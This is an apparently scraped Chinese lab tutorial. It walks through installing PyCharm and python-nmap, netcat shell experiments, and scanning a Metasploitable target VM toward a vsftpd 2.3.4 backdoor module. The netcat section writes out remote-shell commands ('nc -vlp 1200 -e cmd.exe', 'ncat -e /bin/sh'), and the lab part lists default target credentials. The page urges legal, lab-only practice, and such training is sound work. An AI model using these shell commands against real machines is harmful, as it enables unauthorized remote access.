zoukankan      html  css  js  c++  java
  • 7.安装pycharm----导入Nmap模块----netcat反向shell----metasploitable靶机环境

    安装pycharm

    www.jetbrains.com/pycharm/
    tar -zxvf p补全
    ls
    cd p补全
    ls
    cd bin
    ls
    ./pycharm.sh
    
    新建项目 pythonRocks.py
    print "python Rocks"
    
    cd Desktop
    ls
    chmod +x pythonRocks.py
    ls
    python pythonRocks.py
    

    导入Nmap模块

    cd Desktop
    pip install python-nmap
    
    • 从网站的方式下载模块
    pypi.python.org/pypi
    索引 nmap
    解压   打开终端
    cd python-nmap-0.6.1/
    ls
    cd python-nmap-0.6.1/
    ls
    python setup.py install
    

    打开pycharm 新建项目 nmap_Test

    improt nmap
    nmap1 =nmap.PortScanner()
    
    a = nmap1.nmap_version()
    
    print(a)
    
    ls
    python nmap_Test.py
    nmap -v
    

    netcat反向shell

    ncat
    nc --help
    nc -help
    windows:cd Desktop
    nc -vlp 1200
    linux:nc - vv windowsIP地址 1200
    hello,this it a test message.
    windows:hello,it is me.
    linux:退出nc
    
    windows:nc -help
    nc -vlp 1200 -e cmd.exe
    linux:nc - vv windowsIP地址 1200
    
    nc -vlp 1200 -e /bin/sh
    ncat -e /bin/sh 1200
    sudo bash
    apt-get install nmap
    ncat -e /bin/sh -vlp 1200 
    windows:nc -vv linuxIP地址 1200
    

    metasploitable

    服务器端攻击,这些IP一般不会变,域名如facebook.com
    ping www.facebook.com
    下载靶机metasploitable到虚拟机

    • 在靶机中的所有实验和现实情况是一模一样的,请大家一定要遵守法律。

    • 不得打着没有实战的口号,进行正式站点的实战尝试。
      ** 你会发现带有网络web功能的靶机在浏览器里显示内容。
      ** 它是没有安全性功能的靶机,更方便用于原理学习,帮助你更好的验证红队技术。
      ** 正相反,实际站点的安全性非常丰富,防御组件繁多,更不利于学习和掌握核心技术。
      ** 因此,综合所有原因。靶机才是最实际的实战方式,可以测试你所有技术。

    • 例子为parrot发行版

    确保靶机网络设置为NAT
    不管是服务器渗透还是客户端渗透,先拿到目标IP地址
    靶机:ifconfig
    parrot:浏览器     输入靶机IP
    我们的目标是收集信息,收集靶机中的关于服务器的信息
    你可以使用zenmap和nmap在图形化工具与命令行工具中灵活切换
    打开zenmap 输入靶机IP地址  选择强烈扫描    下面就会显示生成命令行
    会看见打开了很多服务与端口
    
    ssh msfadmin@靶机IP
    是否使用RSA密钥选择yes
    默认密码 msfadmin
    clear    ls    ifconfig    whoami    uname -r    logout
    
    查看zenmap扫描结果信息
    谷歌 vsftpd 2.3.4 exploits    得到这个模块是一个获取后门的模块
    parrot:msfconsole
    


    再次声明:过分的体现红队信息,真正受益者是用户和蓝队。

    如果您不看见,就不会注意版本信息,也就不会重视升级与更新。

    随着时间的推移,攻击您的不是初学者,而是更高级别的国际犯罪者。

  • 相关阅读:
    zoj 3715 K
    bzoj 2002(弹飞绵羊) 分块
    最大01矩阵(悬线法)
    csu 1809 Parenthesis(线段树)
    csu 1804(有向无环图)
    csu 1803(2016)
    RCC 2017 Qual 1 Mail.Ru, April 2, 2017 Problem C. Magic Artifact
    Unmarshaller解析xml文件
    sax解析xml文件,封装到对象中
    cas环境搭建
  • 原文地址:https://www.cnblogs.com/sec875/p/11296859.html
Copyright © 2011-2022 走看看